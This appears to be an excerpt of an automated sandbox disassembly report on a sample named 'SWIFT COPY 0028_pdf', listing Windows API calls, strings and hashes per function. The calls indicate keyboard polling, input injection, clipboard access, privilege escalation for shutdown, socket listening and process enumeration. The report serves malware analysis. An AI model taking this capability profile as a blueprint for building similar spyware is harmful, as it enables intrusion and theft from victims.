                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00970A98
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970AAC
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970ADE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970AFF
                                                                                    • _wcscpy.LIBCMT ref: 00970B0B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00970B4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: b93a123ec4c7722f364446ee47ea1e030229317c04422ece3c7f0d76b360e5f0
                                                                                    • Instruction ID: 61ca6125bacfb6b184e0637b4799aa05be3a5c7e6979158a033458b1043f9f2f
                                                                                    • Opcode Fuzzy Hash: b93a123ec4c7722f364446ee47ea1e030229317c04422ece3c7f0d76b360e5f0
                                                                                    • Instruction Fuzzy Hash: 9A6129B25083059FDB10EF60C885A9EB3E8FFC9314F04895AF999C7251DB35EA45CB92
                                                                                    APIs
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0095ABD7
                                                                                      • Part of subcall function 0095ABBB: GetLastError.KERNEL32(?,0095A69F,?,?,?), ref: 0095ABE1
                                                                                      • Part of subcall function 0095ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0095A69F,?,?,?), ref: 0095ABF0
                                                                                      • Part of subcall function 0095ABBB: HeapAlloc.KERNEL32(00000000,?,0095A69F,?,?,?), ref: 0095ABF7
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0095AC0E
                                                                                      • Part of subcall function 0095AC56: GetProcessHeap.KERNEL32(00000008,0095A6B5,00000000,00000000,?,0095A6B5,?), ref: 0095AC62
                                                                                      • Part of subcall function 0095AC56: HeapAlloc.KERNEL32(00000000,?,0095A6B5,?), ref: 0095AC69
                                                                                      • Part of subcall function 0095AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0095A6B5,?), ref: 0095AC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0095A6D0
                                                                                    • _memset.LIBCMT ref: 0095A6E5
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0095A704
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A715
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0095A752
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0095A76E
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A78B
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0095A79A
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0095A7A1
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0095A7C2
                                                                                    • CopySid.ADVAPI32(00000000), ref: 0095A7C9
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0095A7FA
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0095A820
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0095A834
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: f11ee1f43af867d3653c6b9d02bb0237f4d11506b41e1b956433aa539e4c907f
                                                                                    • Instruction ID: d73df32b0dbf8356aa530b5474f9e271258c6d48c352185bd7f86ff628a21be3
                                                                                    • Opcode Fuzzy Hash: f11ee1f43af867d3653c6b9d02bb0237f4d11506b41e1b956433aa539e4c907f
                                                                                    • Instruction Fuzzy Hash: A7515D71900219AFDF10DFA6DC44EEEBBB9FF45305F048229F911A7290DB349A09DBA5
                                                                                    APIs
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00965FA6,?), ref: 00966ED8
                                                                                      • Part of subcall function 009672CB: GetFileAttributesW.KERNEL32(?,00966019), ref: 009672CC
                                                                                    • _wcscat.LIBCMT ref: 00966441
                                                                                    • __wsplitpath.LIBCMT ref: 0096645F
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00966474
                                                                                    • _wcscpy.LIBCMT ref: 009664A3
                                                                                    • _wcscat.LIBCMT ref: 009664B8
                                                                                    • _wcscat.LIBCMT ref: 009664CA
                                                                                    • DeleteFileW.KERNEL32(?), ref: 009664DA
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009664EB
                                                                                    • FindClose.KERNEL32(00000000), ref: 00966506
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                    • String ID: \*.*$p1#v`K$v
                                                                                    • API String ID: 2643075503-1732502266
                                                                                    • Opcode ID: 3c45eb26948c71d1c944ad3208c8844148d180fffffc89d562dcaa2a914657b7
                                                                                    • Instruction ID: 1a19bf48f0ecdafb617b3e16099b835a6224626c435de45ac7a5d2dce3b0477b
                                                                                    • Opcode Fuzzy Hash: 3c45eb26948c71d1c944ad3208c8844148d180fffffc89d562dcaa2a914657b7
                                                                                    • Instruction Fuzzy Hash: 873150B240C384AAC721DBA48885EDBB7DCAF96314F44492EF6D9C3141EB35E509C7A7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                    • API String ID: 0-4052911093
                                                                                    • Opcode ID: fbfe0007a3a0f65160ca5bf4f3afbedf85ffb1f89515cd764ef7f5be56003988
                                                                                    • Instruction ID: 2a9785e8428d32e72f83466147c2a91945de281c9bd7c2cceee7cfe4cd6b961d
                                                                                    • Opcode Fuzzy Hash: fbfe0007a3a0f65160ca5bf4f3afbedf85ffb1f89515cd764ef7f5be56003988
                                                                                    • Instruction Fuzzy Hash: 94729271E04229DBDF24DF98D8407AEB7B5FF49310F24856AE815EB284DB349E81DB90
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0098328E
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0098332D
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009833C5
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00983604
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00983611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00962B5F
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00962BE0
                                                                                    • GetKeyState.USER32(000000A0), ref: 00962BFB
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00962C15
                                                                                    • GetKeyState.USER32(000000A1), ref: 00962C2A
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00962C42
                                                                                    • GetKeyState.USER32(00000011), ref: 00962C54
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00962C6C
                                                                                    • GetKeyState.USER32(00000012), ref: 00962C7E
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00962C96
                                                                                    • GetKeyState.USER32(0000005B), ref: 00962CA8
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    APIs
                                                                                      • Part of subcall function 00959ABF: CLSIDFromProgID.OLE32 ref: 00959ADC
                                                                                      • Part of subcall function 00959ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00959AF7
                                                                                      • Part of subcall function 00959ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00959B05
                                                                                      • Part of subcall function 00959ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00959B15
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0097C235
                                                                                    • _memset.LIBCMT ref: 0097C242
                                                                                    • _memset.LIBCMT ref: 0097C360
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0097C38C
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0097C397
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 0097C3E5
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    APIs
                                                                                      • Part of subcall function 0095B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095B180
                                                                                      • Part of subcall function 0095B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
                                                                                      • Part of subcall function 0095B134: GetLastError.KERNEL32 ref: 0095B1BA
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00967A0F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00978CA8
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978CB7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00978CD3
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00978CE2
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978CFC
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00978D10
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00966554
                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00966564
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00966583
                                                                                    • __wsplitpath.LIBCMT ref: 009665A7
                                                                                    • _wcscat.LIBCMT ref: 009665BA
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009665F9
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                    • String ID:
                                                                                    • API String ID: 1605983538-0
                                                                                    APIs
                                                                                      • Part of subcall function 0097A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0097A84E
                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00979296
                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009792B9
                                                                                    Similarity
                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 4170576061-0
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0096EB8A
                                                                                    • _wcscmp.LIBCMT ref: 0096EBBA
                                                                                    • _wcscmp.LIBCMT ref: 0096EBCF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0096EBE0
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0096EC0E
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 2387731787-0
                                                                                    APIs
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
Strings
Similarity
• API ID:
• String ID: ERCP$VUUU$VUUU$VUUU$VUUU
• API String ID: 0-1546025612
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0093E014,76230AE0,0093DEF1,009BDC38,?,?), ref: 0093E02C
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0093E03E
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 009613DC
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
  • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
• DefDlgProcW.USER32(?,?,?,?,?), ref: 0093B22F
  • Part of subcall function 0093B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0093B5A5
Similarity
• API ID: Proc$LongWindow
• String ID:
• API String ID: 2749884682-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009743BF,00000000), ref: 00974FA6
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00974FD2
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0096E20D
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0096E267
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0096E2B4
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 0093F4EA: std::exception::exception.LIBCMT ref: 0093F51E
  • Part of subcall function 0093F4EA: __CxxThrowException@8.LIBCMT ref: 0093F533
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
• GetLastError.KERNEL32 ref: 0095B1BA
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009666AF
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009666EC
• CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009666F5
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00967223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0096723A
• FreeSid.ADVAPI32(?), ref: 0096724A
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0096F599
• FindClose.KERNEL32(00000000), ref: 0096F5C9
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: ad08242cddd11fdacbaf2608fea7b9e1451c21af6ed3015aa7e3bc1d8d3a076d
                                                                                    • Instruction ID: 075891ab9c16100859da335d1a442dbcec8c578e3ea824018a4682429453e4f0
                                                                                    • Opcode Fuzzy Hash: ad08242cddd11fdacbaf2608fea7b9e1451c21af6ed3015aa7e3bc1d8d3a076d
                                                                                    • Instruction Fuzzy Hash: B411C4716042009FDB04EF28D845A2EB3E8FF89324F00895EF8A6D7291CB30BD008B81
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0097BE6A,?,?,00000000,?), ref: 0096CEA7
                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0097BE6A,?,?,00000000,?), ref: 0096CEB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatLastMessage
                                                                                    • String ID:
                                                                                    • API String ID: 3479602957-0
                                                                                    • Opcode ID: 166745085ad34b467a353339bea19d1bc321316fe3692bea7269f252b6f161f6
                                                                                    • Instruction ID: 495f2bb58babde48affa7e9d10bc69273b12a8a912deb622a54d871190a1ceb7
                                                                                    • Opcode Fuzzy Hash: 166745085ad34b467a353339bea19d1bc321316fe3692bea7269f252b6f161f6
                                                                                    • Instruction Fuzzy Hash: 45F08C71514229ABDB20ABA4DC49FFA776DFF093A1F008165F91AD6181D6709A40CBA0
                                                                                    APIs
                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00964153
                                                                                    • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00964166
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InputSendkeybd_event
                                                                                    • String ID:
                                                                                    • API String ID: 3536248340-0
                                                                                    • Opcode ID: d07e5028b795618cab8088f32daf27b512bf379b82166a47e3ba360be58b385c
                                                                                    • Instruction ID: 2bf9db68a814c5bc5829c6ea1fa5482611f2eaa9ed28cefb1498d567986f3dfe
                                                                                    • Opcode Fuzzy Hash: d07e5028b795618cab8088f32daf27b512bf379b82166a47e3ba360be58b385c
                                                                                    • Instruction Fuzzy Hash: E9F0677081824DAFDB058FA0C805BBE7BB4EF11305F00840AF966AA192D77986129FA0
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0095ACC0), ref: 0095AB99
                                                                                    • CloseHandle.KERNEL32(?,?,0095ACC0), ref: 0095ABAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: cf279dd0330eaf755972d947c78dec9924f08aef2c96e83add08c15572b55da8
                                                                                    • Instruction ID: 8b8247879299d0dc762289e7cfd0d30d8a42b248565b89b0862de897c3cdb36d
                                                                                    • Opcode Fuzzy Hash: cf279dd0330eaf755972d947c78dec9924f08aef2c96e83add08c15572b55da8
                                                                                    • Instruction Fuzzy Hash: DAE0E675414510AFE7252F55EC05D777BEDEF44321B108529F85B81870DB625C90DB94
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00946DB3,-0000031A,?,?,00000001), ref: 009481B1
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009481BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 9b51facbab5e3b3fc89196cef157b7c8aa7a713882be1697c3e6c3f7bd6ba846
                                                                                    • Instruction ID: 8ff370bc8f7169d03969b1486af3d4198e7bbe1bacb30e30ea2b173e6326ad5d
                                                                                    • Opcode Fuzzy Hash: 9b51facbab5e3b3fc89196cef157b7c8aa7a713882be1697c3e6c3f7bd6ba846
                                                                                    • Instruction Fuzzy Hash: 29B09231059608ABDF002BA1EC09B587F68EF0A65AF004010F60E448619F725510ABD2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: f1f24cfa5cfe78c92eaf9e6a3c0b18f178e8497b7ff82c00a5461c5055f9defb
                                                                                    • Instruction ID: f56ac288e176cb1e30dd7a125df7315af9b7b62dce5d96bf05a9743f949868fb
                                                                                    • Opcode Fuzzy Hash: f1f24cfa5cfe78c92eaf9e6a3c0b18f178e8497b7ff82c00a5461c5055f9defb
                                                                                    • Instruction Fuzzy Hash: 55A25A74E04229CFCB24CFA8D4806ADFBB5FF49314F2581A9D859AB394D7349E81DB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
